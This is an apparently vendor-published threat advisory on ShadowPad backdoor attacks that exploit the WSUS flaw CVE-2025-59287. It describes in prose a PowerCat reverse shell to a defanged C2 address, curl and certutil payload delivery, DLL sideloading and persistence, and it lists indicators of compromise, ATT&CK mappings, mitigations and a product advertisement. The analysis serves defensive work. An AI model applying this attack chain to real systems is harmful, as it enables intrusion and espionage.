You are currently viewing ShadowPad’s Silent Invasion: Crafting Persistence Through WSUS Exploitation

ShadowPad’s Silent Invasion: Crafting Persistence Through WSUS Exploitation

The ShadowPad malware campaign represents an urgent and advanced cybersecurity threat, exploiting a critical vulnerability in Microsoft’s WSUS service to gain full system access. This highly modular backdoor is being actively leveraged by state-aligned threat actors to target key sectors globally, emphasizing the need for immediate detection and mitigation efforts.

Executive Summary

A sophisticated cyberattack campaign, identified in November 2025, leverages a critical vulnerability in Microsoft Windows Server Update Services (WSUS) to deploy ShadowPad, a highly modular backdoor malware used extensively by Chinese state-sponsored APT groups for espionage operations.

ShadowPad is a privately sold, modular backdoor platform that has been active since 2015 and is widely considered the successor to PlugX. The malware operates through DLL sideloading, leveraging a legitimate executable (ETDCtrlHelper.exe) to load a malicious DLL payload (ETDApix.dll), which serves as a memory-resident loader to execute the backdoor. Upon execution, ShadowPad launches a core module responsible for loading other plugins embedded in the shellcode into memory, enabling flexible remote control capabilities including command execution, lateral movement, and data exfiltration.

Attack Methodology

The ShadowPad campaign has targeted organizations globally, with SentinelOne research identifying over 70 victims across multiple sectors including manufacturing, government, finance, telecommunications, and research between July 2024 and March 2025.

Exploitation of CVE-2025-59287

Beginning October 22, 2025, threat actors rapidly weaponized the publicly released proof-of-concept exploit for CVE-2025-59287 to target WSUS servers exposed on TCP ports 8530 and 8531. The vulnerability stems from unsafe deserialization of untrusted data within WSUS reporting web services, allowing remote unauthenticated attackers to execute arbitrary code with SYSTEM privileges.

Initial Access and Foothold Establishment

After exploiting the WSUS vulnerability, attackers deployed PowerCat, an open-source PowerShell-based Netcat utility, to establish an interactive command shell on compromised servers. The observed PowerShell command downloaded PowerCat from GitHub and connected to a remote C2 IP address (154.17.26[.]41) on port 8080, granting complete control of the host.

ShadowPad Installation via Living-off-the-Land Binaries

On November 6, 2025, attackers exploited the same vulnerability to execute legitimate Windows utilities (curl.exe and certutil.exe) for malware delivery. The attackers downloaded base64-encoded ShadowPad components from an external server (149.28.78[.]189:42306), decoded them using certutil, and deployed the malware directly onto victim systems.

Exploited Vulnerabilities

CVE IDImpactExploit PrerequisitesCVSS ScoreEPSS Score
CVE-2025-59287Remote code execution with SYSTEM privileges via WSUS deserialization flawNetwork access to WSUS server on ports 8530/85319.864.04%
CVE-2024-24919VPN credential theft enabling initial network accessUnpatched Check Point gateway devices8.694.34%
CVE-2021-26855Microsoft Exchange ProxyLogon RCEUnpatched Exchange servers9.194.37%

Mitigation & Remediation

Given the active exploitation of CVE-2025-59287 to deploy ShadowPad, immediate mitigation is critical:

  • Apply Microsoft’s out-of-band security update (KB5070881/KB5070882) released October 23, 2025, to address CVE-2025-59287.
  • Block inbound traffic to TCP ports 8530 and 8531 on host-level firewalls to remove the attack vector.
  • Review WSUS server exposure and ensure only Microsoft Update servers can access WSUS infrastructure.
  • Audit for suspicious activity including execution history of PowerShell, certutil.exe, and curl.exe, and network connection logs for anomalous patterns.
  • Monitor for DLL sideloading indicators including suspicious ETDCtrlHelper.exe and ETDApix.dll file combinations.
  • Disable the WSUS Server Role temporarily if patching cannot be applied immediately.

Capabilities

ShadowPad demonstrates sophisticated capabilities designed for long-term espionage operations:

  • Modular backdoor architecture enabling dynamic plugin loading from C2 servers during runtime.
  • DLL Search Order Hijacking execution via legitimate executables like ETDCtrlHelper.exe to evade detection.
  • Multi-protocol C2 communications supporting TCP, UDP, HTTP, HTTPS, SSL, and DNS protocols.
  • Domain Generation Algorithm (DGA) based on the day of the month for resilient C2 connectivity.
  • System reconnaissance including hostname, username, OS version, memory status, and CPU frequency collection.
  • Registry-based persistence and configuration storage using virtual file systems.
  • Process injection capabilities targeting legitimate Windows processes including svchost.exe, Windows Mail, and Windows Media Player.

Visual Flow

Initial Access (internet scanning) -> Exploitation (CVE-2025-59287; crafted SOAP to WSUS on 8530/8531) -> Foothold / Payload Delivery (PowerShell PowerCat -> interactive SYSTEM shell; use of curl.exe/certutil.exe to fetch & decode ShadowPad components) -> Execution & Persistence (DLL sideloading via ETDCtrlHelper.exe; registry edits; scheduled task Microsoft\Windows\UPnP; service install Q-X64 Service) -> Command & Control (HTTP/HTTPS to C2 163.61.102[.]245:443 with spoofed Firefox UA) -> Impact (long-term espionage: data exfiltration, lateral movement, plugin deployment for surveillance)

Indicators of Compromise

The ShadowPad campaign exposes several host, network, and behavioral indicators that organizations can use to detect potential compromise:

Host-Based IOCs

  • Malicious DLL (ETDApix.dll) delivered via DLL sideloading with legitimate executable (ETDCtrlHelper.exe).
  • Configuration file: 0C137A80.tmp in %PROGRAMDATA% directory.
  • Service creation: “Q-X64” with description “Q-X64 Service for windows.”
  • Scheduled task under: Microsoft\Windows\UPnP named “Microsoft Corporation.”
  • Registry persistence: SOFTWARE\Microsoft\Windows\CurrentVersion\Run with value “Q-X64.”
  • Process injection into: WinMail.exe, wmpnetwk.exe, wmplayer.exe, svchost.exe.

Behavioral IOCs

  • PowerShell execution downloading PowerCat from GitHub repositories.
  • Certutil.exe usage for base64 decoding of downloaded files.
  • Curl.exe downloading .txt files from external IP addresses.
  • Unexpected child processes spawned from wsusservice.exe or w3wp.exe.

These indicators collectively reflect Chinese APT groups’ sophisticated tradecraft—leveraging zero-day exploitation, living-off-the-land binaries, and modular malware platforms—to deploy ShadowPad and maintain persistent access for espionage operations.

Tactics and Techniques

Attackers are exploiting critical infrastructure components to achieve remote code execution and establish persistent backdoor access.

TA0001 – Initial Access: Attackers gain entry through exploitation of the CVE-2025-59287 deserialization vulnerability in publicly exposed WSUS servers.

T1190 – Exploit Public-Facing Application: Exploitation of WSUS web service endpoints to achieve unauthenticated remote code execution with SYSTEM privileges.

TA0002 – Execution: Execution of malicious payloads via PowerShell (PowerCat), certutil, and curl following successful exploitation.

T1059.001 – Command and Scripting Interpreter: PowerShell: Use of PowerShell to download and execute PowerCat for establishing reverse shell connections.

TA0003 – Persistence: Establishment of persistence via registry modifications, scheduled tasks, and Windows service creation (Q-X64).

T1574.001 – Hijack Execution Flow: DLL Search Order Hijacking: Leveraging legitimate ELAN touchpad executable (ETDCtrlHelper.exe) to sideload malicious ShadowPad loader DLL.

T1071 – Application Layer Protocol: ShadowPad communicates over HTTP/HTTPS to C2 servers using spoofed browser headers to blend with legitimate traffic.

Instantly Fix Risks with Saner Patch Management

Saner patch management is a continuous, automated, and integrated software that instantly fixes risks exploited in the wild. The software supports major operating systems like Windows, Linux, and macOS, as well as 550+ third-party applications.

It also allows you to set up a safe testing area to test patches before deploying them in a primary production environment. Saner patch management additionally supports a patch rollback feature in case of patch failure or a system malfunction.

Experience the fastest and most accurate patching software here.